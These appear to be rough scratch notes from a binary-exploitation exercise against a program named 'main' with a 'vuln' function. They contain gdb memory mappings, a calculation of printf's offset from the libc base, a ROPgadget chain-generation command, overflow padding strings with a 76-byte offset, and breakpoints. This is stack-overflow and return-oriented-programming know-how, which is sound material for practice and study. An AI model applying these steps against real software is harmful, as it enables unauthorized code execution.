info sharedlibrary
0x00007f9c095f2320  0x00007f9c0973839b  Yes         /lib/x86_64-linux-gnu/libc.so.6
info proc mapping
      0x7f9c095d0000     0x7f9c095f2000    0x22000        0x0 /lib/x86_64-linux-gnu/libc-2.28.so
      0x7f9c095f2000     0x7f9c0973a000   0x148000    0x22000 /lib/x86_64-linux-gnu/libc-2.28.so
      0x7f9c0973a000     0x7f9c09786000    0x4c000   0x16a000 /lib/x86_64-linux-gnu/libc-2.28.so
      0x7f9c09786000     0x7f9c09787000     0x1000   0x1b6000 /lib/x86_64-linux-gnu/libc-2.28.so
      0x7f9c09787000     0x7f9c0978b000     0x4000   0x1b6000 /lib/x86_64-linux-gnu/libc-2.28.so
      0x7f9c0978b000     0x7f9c0978d000     0x2000   0x1ba000 /lib/x86_64-linux-gnu/libc-2.28.so

disas printf
0x00007f9c09628560

0x00007f9c09628560-0x7f9c095d0000 = 0x58560

ROPgadget --ropchain --binary /lib/x86_64-linux-gnu/libc-2.28.so > rop



AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV
'A'*76+
pop esp


gdb ./main
br *main+70
r

gdb ./main
br *vuln+44
r

0x7f3a69158560